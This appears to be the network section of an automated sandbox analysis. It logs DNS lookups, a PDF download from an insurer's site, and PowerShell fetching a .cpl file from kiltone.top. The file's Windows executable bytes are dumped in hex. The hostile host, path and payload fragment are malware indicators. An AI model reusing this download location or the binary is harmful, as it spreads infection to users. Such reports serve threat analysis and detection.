                                                                                                                                              Dec 19, 2024 07:52:28.833085060 CET53511851.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:45.459475994 CET53582231.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:03.046288967 CET138138192.168.2.9192.168.2.255
                                                                                                                                              Dec 19, 2024 07:53:04.433284998 CET53539431.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:24.300299883 CET53571431.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:27.475104094 CET53630521.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:58.159589052 CET53534961.1.1.1192.168.2.9
                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                              Dec 19, 2024 07:52:26.339456081 CET192.168.2.91.1.1.1c259(Port unreachable)Destination Unreachable
                                                                                                                                              Dec 19, 2024 07:53:29.834866047 CET192.168.2.91.1.1.14d5aEcho
                                                                                                                                              Dec 19, 2024 07:53:29.973234892 CET1.1.1.1192.168.2.9555aEcho Reply
                                                                                                                                              Dec 19, 2024 07:53:42.954849005 CET192.168.2.91.1.1.14d59Echo
                                                                                                                                              Dec 19, 2024 07:53:43.093265057 CET1.1.1.1192.168.2.95559Echo Reply
                                                                                                                                              Dec 19, 2024 07:53:48.479067087 CET192.168.2.91.1.1.14d58Echo
                                                                                                                                              Dec 19, 2024 07:53:48.617376089 CET1.1.1.1192.168.2.95558Echo Reply
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Dec 19, 2024 07:52:25.173783064 CET192.168.2.91.1.1.10xfa9fStandard query (0)www.oldmutual.co.zaA (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:25.174007893 CET192.168.2.91.1.1.10x96f1Standard query (0)www.oldmutual.co.za65IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.188719034 CET192.168.2.91.1.1.10xe1eStandard query (0)kiltone.topA (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.198293924 CET192.168.2.91.1.1.10x212eStandard query (0)www.oldmutual.co.zaA (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.198847055 CET192.168.2.91.1.1.10xd9e2Standard query (0)www.oldmutual.co.za65IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:28.693464041 CET192.168.2.91.1.1.10x74c7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:28.693583965 CET192.168.2.91.1.1.10x9e99Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET1.1.1.1192.168.2.90xfa9fNo error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET1.1.1.1192.168.2.90xfa9fNo error (0)d12y248af9ueom.cloudfront.net18.161.69.16A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET1.1.1.1192.168.2.90xfa9fNo error (0)d12y248af9ueom.cloudfront.net18.161.69.63A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET1.1.1.1192.168.2.90xfa9fNo error (0)d12y248af9ueom.cloudfront.net18.161.69.71A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET1.1.1.1192.168.2.90xfa9fNo error (0)d12y248af9ueom.cloudfront.net18.161.69.4A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET1.1.1.1192.168.2.90x212eNo error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET1.1.1.1192.168.2.90x212eNo error (0)d12y248af9ueom.cloudfront.net18.161.69.71A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET1.1.1.1192.168.2.90x212eNo error (0)d12y248af9ueom.cloudfront.net18.161.69.4A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET1.1.1.1192.168.2.90x212eNo error (0)d12y248af9ueom.cloudfront.net18.161.69.16A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET1.1.1.1192.168.2.90x212eNo error (0)d12y248af9ueom.cloudfront.net18.161.69.63A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.474509001 CET1.1.1.1192.168.2.90x96f1No error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.474695921 CET1.1.1.1192.168.2.90xd9e2No error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:26.596384048 CET1.1.1.1192.168.2.90xe1eNo error (0)kiltone.top45.125.67.168A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:28.832722902 CET1.1.1.1192.168.2.90x74c7No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                              Dec 19, 2024 07:52:28.833085060 CET1.1.1.1192.168.2.90x9e99No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              • www.oldmutual.co.za
                                                                                                                                              • kiltone.top
                                                                                                                                              • https:
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.94971318.161.69.164433988C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-19 06:52:28 UTC778OUTGET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1
                                                                                                                                              Host: www.oldmutual.co.za
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-12-19 06:52:29 UTC1048INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: application/pdf
                                                                                                                                              Content-Length: 313058
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Fastly-Io-Error: not a supported image format
                                                                                                                                              Fastly-Io-Served-By: vpop-etou8240196
                                                                                                                                              Fastly-Stats: io=1
                                                                                                                                              Server: contentstack
                                                                                                                                              X-Contentstack-Organization: blt2c31cdce6d24f06c
                                                                                                                                              X-Request-Id: 3dd79f5f402ab71f92243ac6017a1eed
                                                                                                                                              X-Runtime: 97ms
                                                                                                                                              Via: 1.1 varnish, 1.1 varnish, 1.1 8e3bfda7f79eae3b0adf702cec19c81e.cloudfront.net (CloudFront)
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Thu, 19 Dec 2024 06:52:28 GMT
                                                                                                                                              X-Served-By: cache-ams21052-AMS, cache-fjr990025-FJR
                                                                                                                                              X-Cache-Hits: 4, 0
                                                                                                                                              X-Timer: S1734591149.900478,VS0,VE1
                                                                                                                                              Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Strict-Transport-Security: max-age=31557600
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                              X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                              X-Amz-Cf-Id: xM7dalgq4kGVNV_N0i6tdEmgNyhecqQSul-8vbaOccEgLgc5pAGVUQ==
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76
                                                                                                                                              Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
                                                                                                                                              2024-12-19 06:52:29 UTC6002INData Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42
                                                                                                                                              Data Ascii: 'ca]^VpN./+V./+^bmqPV_|ZV"qU|iYY'^~Mc8485(<gu"F|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
                                                                                                                                              2024-12-19 06:52:29 UTC2292INData Raw: 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 31 35 2f 4c 65 6e 67 74 68 20 33 38 30 2f 4e 20 32 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 3c d4 db 71 e5 30 0c 03 d0 56 5c 82 0d c9 b6 d4 46 7e 33 e9 bf 8d ec e4 1e ec 17 86 6f 90 a2 78 5d fb 3c ce 63 af 7d dc e7 7d 7c 8f fb fe 27 7e 1d e3 5d 1f bc e7 07 67 71 d0 07 5e 7f 38 cf 09 c5 cf c6 9f 50 dc 4b 7e 2f f8 7c f0 29 be f4 ad 43 7e f8 3f 9b bd 7e 78 3d ea 3e 95 c5 3f e5 d9 38 f2 5b ff f2 6b 7d bc 27 ff d9 7e d8 ef a5 cf 07 56 de 10 af 09 57 e8 f1 5f f2 ac da f1 5c ec 1b ff 85 c7 52 7f 8b db 78 2d b8 c5 ef e6 17 bf f5 b9 cb ef 84 f4 ab f2 5f fc cf f7 28 41 0e 51 20 88 65 57 7f 42 32 02 d9 d5 3f f0 a5 17 af a1 20 18 8d 45 c3 b1 70 79 5b 57
                                                                                                                                              Data Ascii: <</Filter/FlateDecode/First 15/Length 380/N 2/Type/ObjStm>>streamh<q0V\F~3ox]<c}}|'~]gq^8PK~/|)C~?~x=>?8[k}'~VW_\Rx-_(AQ eWB2? Epy[W
                                                                                                                                              2024-12-19 06:52:29 UTC12339INData Raw: 01 2c 11 87 c0 32 71 08 9c 24 0e 81 15 f3 1e ba de 1c d0 9b 40 dc 43 3f 30 ef 71 5f 66 03 f9 32 87 78 9c d0 29 e2 79 e8 34 f1 3c 74 86 78 1e 3a 4b 36 2d 80 73 64 93 c0 79 b2 49 c0 25 9b 04 72 c4 49 03 5c 20 0e 81 3c 71 08 ac 12 87 40 c1 f3 2b 09 b4 e6 f9 45 e8 a2 e7 17 a1 4b 9e 5f 84 7e e8 f9 45 e8 47 9e 5f 84 7e ec f9 45 e8 b2 e7 17 a1 2b c8 f1 a1 6a 01 af 7a 33 39 0b f8 96 0f 5f 07 bc 46 49 f7 66 09 cc ae e3 35 5a e6 ac fb 90 38 6f 7b 1c 5e e6 dc c0 e2 e9 ea ae 37 bd 99 b7 e2 1d 1f d2 8a 9f f8 90 e8 1b d8 a7 4c 78 d7 87 44 78 cf 87 44 78 1f dc 99 ea 7e 1f 78 33 8f fe a1 0f 89 fe 91 0f 89 fe 53 ac 2c 13 3e f6 21 11 6e f9 90 08 3f 03 f7 70 75 bf db de cc a3 7f e2 43 a2 ff dc 87 44 ff 05 56 96 09 bf f4 21 11 7e e5 43 22 dc 31 ef 35 04 94 ca 97 d5 64 54 d6
                                                                                                                                              Data Ascii: ,2q$@C?0q_f2x)y4<tx:K6-sdyI%rI\ <q@+EK_~EG_~E+jz39_FIf5Z8o{^7LxDxDx~x3S,>!n?puCDV!~C"15dT
                                                                                                                                              2024-12-19 06:52:29 UTC13710INData Raw: 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 38 37 39 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 31 35 36 2e 37 32 20 31 32 2e 38 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72
                                                                                                                                              Data Ascii: 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj879 0 obj<</BBox[0.0 0.0 156.72 12.84]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>str
                                                                                                                                              2024-12-19 06:52:29 UTC12804INData Raw: 6b 5b 46 5a db 52 2d be 2c 7e 6f 0b fc 2a 34 2f ae 41 7c d3 18 98 44 8c e6 85 a5 85 b8 71 8d 06 ed 2a 7e d5 ee 34 75 a7 d3 fa 1d 54 a9 bf 4f bd 90 52 be fe 1f 23 1e f9 14 f1 24 a2 68 36 03 2a a1 4c bb 8d 59 0b 79 04 bc 99 e6 d2 cb e4 9e 16 b9 cb 35 4f 5e 8e c4 38 22 09 89 72 45 03 69 4e 1a 87 5d b1 71 d6 56 a8 92 c5 09 6e d8 a1 66 36 fd de 6b 9b d3 69 6a f9 83 fe 3f 6a db f1 73 ec e0 1d 1a d0 6f 67 eb f1 23 a6 4c 8a b5 c2 b9 fc 6c 04 b0 86 19 4a b1 49 b0 05 5e 07 3a 9f a6 35 7a 39 b6 72 fb bc f1 9e 34 81 f7 96 90 e5 5a 65 ae 85 81 b7 f0 18 89 77 9e 1d a5 02 0f 13 15 41 1c 0e bb c3 68 7a 50 e1 f5 48 92 2a a1 aa 37 df ba f5 e6 f3 f4 95 03 d7 2e 61 3f e3 f4 7b 40 e4 ba 7e 9a 1e d0 bb 17 e1 6c 25 5e cd 0d 87 c4 f1 83 4a 79 58 90 40 00 e4 b0 8b 4a d1 67 95 da
                                                                                                                                              Data Ascii: k[FZR-,~o*4/A|Dq*~4uTOR#$h6*LYy5O^8"rEiN]qVnf6kij?jsog#LlJI^:5z9r4ZewAhzPH*7.a?{@~l%^JyX@Jg
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: e0 35 c4 6f 96 43 d6 da 4f 09 93 88 eb 59 1f 2d 85 bd 73 45 7c fd 21 b8 b1 2a fc dd b1 6e 19 6c 77 9c 7a 24 5c 5e 16 6f 3d c3 33 3c 83 81 0f 9c 39 ce 98 f3 92 f3 66 76 79 f6 e9 ec 6b ae 2a d7 99 cf 0c 3f fe 24 dc f0 3f a0 78 45 b4 65 20 e6 9e cd c0 25 0d df 75 5f 77 df 74 ff 6d 79 78 72 3c 2d 8b e8 d1 30 be 02 8e 7b be e8 b9 ec 79 fb ff 0e 77 1e 17 39 1f 2d 45 6e ce 43 b1 f9 19 9e 16 f8 a7 07 38 60 16 bf 59 f4 a7 43 fb 1a e2 8f 09 4a b0 a7 b7 cd d8 1e 32 da 56 6c bf 8c 5c 62 b6 63 ef 6b 08 bd 4d a0 81 48 46 5b 00 37 39 60 b4 4d 38 3e 61 b4 cd d8 be 68 b4 ad d8 fe 55 64 ea e8 89 d4 d8 c8 e8 0c 6d a8 df b0 81 f6 8d 0e d3 ae a9 c9 99 e9 e1 54 2a 39 43 63 a9 a9 f1 e1 c1 19 ba ed d8 cc e8 54 6a 9a 56 8d 1f 9b 18 1b 9e 49 d6 1e 9b 48 4e 4e 1d 9f 3e 7c 22 34 72
                                                                                                                                              Data Ascii: 5oCOY-sE|!*nlwz$\^o=3<9fvyk*?$?xEe %u_wtmyxr<-0{yw9-EnC8`YCJ2Vl\bckMHF[79`M8>ahUdmT*9CcTjVIHNN>|"4r
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 8f 6c a4 3d ce 17 1b 0f d9 23 a6 6f 7c b5 71 a0 91 47 87 37 7e d7 c8 a3 63 1b 1f 00 6f 1b f0 d2 8d 3c 4d a3 17 1a 79 d0 3f d7 b8 9e 22 a6 50 64 de ce 39 42 14 3e 27 ed 33 05 15 9c 3b 65 ab 21 5d f5 3a ee 8a 28 cf db 8a c5 4b 77 9b 48 13 59 5c 94 0b 7a 2c a6 88 a3 88 25 27 d7 e0 4e b3 dc 6c 52 51 53 09 77 25 a9 98 29 96 84 ba 5f 54 81 c4 a9 b5 5e da 62 e5 16 73 2a 98 b3 63 4a 8b 3b b3 a7 ed 98 8c e9 65 5b a8 62 11 86 32 8e 2e d4 18 a2 31 c7 11 15 9f 5d 5a 52 bd 30 54 ed 09 d5 8f f2 7e 64 de 2f da 02 ac 29 97 84 6a 29 da 2e 8c 08 94 b5 20 1a 41 34 e2 ea ae e3 38 ba a2 86 e3 48 45 8a f6 b2 e3 24 95 66 0a 58 27 10 2f 81 65 dc 2a da 8a cb ac 0a ca 2c f8 e1 28 ea 26 55 c0 94 60 97 58 aa f0 85 ac 40 09 5a ac fb 16 e0 57 71 37 b7 a8 b4 be 18 08 2d 51 16 65 50 50
                                                                                                                                              Data Ascii: l=#o|qG7~co<My?"Pd9B>'3;e!]:(KwHY\z,%'NlRQSw%)_T^bs*cJ;e[b2.1]ZR0T~d/)j). A48HE$fX'/e*,(&U`X@ZWq7-QePP
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 21 d7 44 2f ca 93 69 00 1f 68 f8 70 4f 78 fc be a9 0b 77 8e 7c 8c 6d 2f 8a f3 37 99 fd 14 77 9b 8b 38 8f 56 e1 4c d8 49 f3 f9 79 e3 16 e6 d6 44 b6 8c 6c 88 6b 86 21 ae 0c e7 e5 14 c1 17 d0 b7 f8 6a 2a c0 9d 26 8c af a2 3c fe 3c 68 c2 fd b5 8e 88 0f c1 b8 27 52 24 1f 47 43 f8 0c 94 af a4 6f e3 6c 1b 82 fa 85 48 8f c1 5a 4b a7 6b 64 63 f3 29 8c 3d 41 11 cc 8b b8 6a 0d 25 b1 06 c4 74 45 34 90 bd 09 6d 40 dc 70 04 fd 77 84 de 04 73 34 a5 60 3e a8 04 5e 50 a3 91 f5 b6 e9 67 b1 c0 09 32 41 01 88 03 b9 20 bb c3 7b fb e8 43 8f cf fa 6a e3 01 d5 a3 c7 7c 37 11 2f da c4 18 0a 16 cf 61 9c 3e 41 3a 8b 22 44 0c f4 69 e8 2b 94 24 46 a2 fe 74 8a 63 8f 19 cd 74 91 46 33 1b 98 65 9c 6d 4f 57 d3 32 e4 ef d0 69 1a 4d 1f 61 8f 99 04 3d 45 f9 8a d5 58 9b 67 c9 25 9f b1 03 88
                                                                                                                                              Data Ascii: !D/ihpOxw|m/7w8VLIyDlk!j*&<<h'R$GColHZKkdc)=Aj%tE4m@pws4`>^Pg2A {Cj|7/a>A:"Di+$FtctF3emOW2iMa=EXg%
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 36 37 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 32 38 2e 36 38 20 31 31 2e 36 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d
                                                                                                                                              Data Ascii: t[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1067 0 obj<</BBox[0.0 0.0 28.68 11.64]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstream


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.94971645.125.67.1684436276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-19 06:52:28 UTC172OUTGET /stelin/rwcla.cpl HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                              Host: kiltone.top
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              2024-12-19 06:52:29 UTC253INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                              Date: Thu, 19 Dec 2024 06:52:28 GMT
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Content-Length: 211656
                                                                                                                                              Last-Modified: Fri, 13 Dec 2024 23:55:16 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "675cc964-33ac8"
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-12-19 06:52:29 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 8c 42 de 35 ed 2c 8d 35 ed 2c 8d 35 ed 2c 8d 46 8f 2f 8c 38 ed 2c 8d 46 8f 29 8c ac ed 2c 8d 46 8f 28 8c 23 ed 2c 8d 67 98 28 8c 3a ed 2c 8d 67 98 2f 8c 20 ed 2c 8d 67 98 29 8c 70 ed 2c 8d 46 8f 2d 8c 36 ed 2c 8d 35 ed 2d 8d 4a ed 2c 8d ff 98 25 8c 37 ed 2c 8d ff 98 d3 8d 34 ed 2c 8d ff 98 2e 8c 34 ed 2c 8d 52 69 63 68 35 ed 2c 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qB5,5,5,F/8,F),F(#,g(:,g/ ,g)p,F-6,5-J,%7,4,.4,Rich5,
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 6a ff 68 1d 0d 02 10 64 a1 00 00 00 00 50 81 ec a0 00 00 00 a1 14 f0 02 10 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8d 4d e4 6a 00 89 75 ec c7 45 e0 00 00 00 00 e8 12 0d 00 00 c7 45 fc 00 00 00 00 8b 3d fc 0c 03 10 a1 dc 0c 03 10 89 45 e0 85 ff 75 2f 57 8d 4d e8 e8 f0 0c 00 00 39 3d fc 0c 03 10 75 10 a1 c0 fe 02 10 40 a3 c0 fe 02 10 a3 fc 0c 03 10 8d 4d e8 e8 28 0d 00 00 8b 3d fc 0c 03 10 8b 4e 04 3b 79 0c 73 10 8b 41 08 8b 34 b8 85 f6 0f 85 5d 01 00 00 eb 02 33 f6 80 79 14 00 74 10 e8 17 10 00 00 3b 78 0c 73 0e 8b 40 08 8b 34 b8 85 f6 0f 85 3b 01 00 00 8b 45 e0 85 c0 74 07 8b f0 e9 2d 01 00 00 6a 18 e8 28 2f 00 00 8b f0 83 c4 04 89 75 e8 c6 45 fc 01 0f 57 c0 8b 4d ec 0f 11 06 66 0f d6 46 10 8b 49 04 85 c9 74 0c 8b 41 18 85 c0 75 0a 8d
                                                                                                                                              Data Ascii: jhdP3EVWPEduMjuEE=Eu/WM9=u@M(=N;ysA4]3yt;xs@4;Et-j(/uEWMfFItAu
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 00 10 89 4d f8 89 45 fc 64 a1 00 00 00 00 89 45 e8 8d 45 e8 64 a3 00 00 00 00 ff 75 18 51 ff 75 10 e8 c7 2c 00 00 8b c8 8b 45 e8 64 a3 00 00 00 00 8b c1 c9 c3 55 8b ec 83 ec 40 53 81 7d 08 23 01 00 00 75 12 b8 02 8c 00 10 8b 4d 0c 89 01 33 c0 40 e9 d1 00 00 00 83 65 c0 00 c7 45 c4 4e 8d 00 10 a1 14 f0 02 10 8d 4d c0 33 c1 89 45 c8 8b 45 18 89 45 cc 8b 45 0c 89 45 d0 8b 45 1c 89 45 d4 8b 45 20 89 45 d8 83 65 dc 00 83 65 e0 00 83 65 e4 00 89 65 dc 89 6d e0 64 a1 00 00 00 00 89 45 c0 8d 45 c0 64 a3 00 00 00 00 8b 45 08 ff 30 e8 7f 7b 01 00 59 8b 4d 08 89 01 c7 45 f8 01 00 00 00 8b 45 08 89 45 e8 8b 45 10 89 45 ec e8 bd 1d 00 00 8b 40 08 89 45 fc a1 38 11 02 10 89 45 f4 8b 4d fc ff 55 f4 8b 45 fc 89 45 f0 8d 45 e8 50 8b 45 08 ff 30 ff 55 f0 59 59 83 65 f8 00
                                                                                                                                              Data Ascii: MEdEEduQu,EdU@S}#uM3@eENM3EEEEEEEE EeeeemdEEdE0{YMEEEEE@E8EMUEEEPE0UYYe
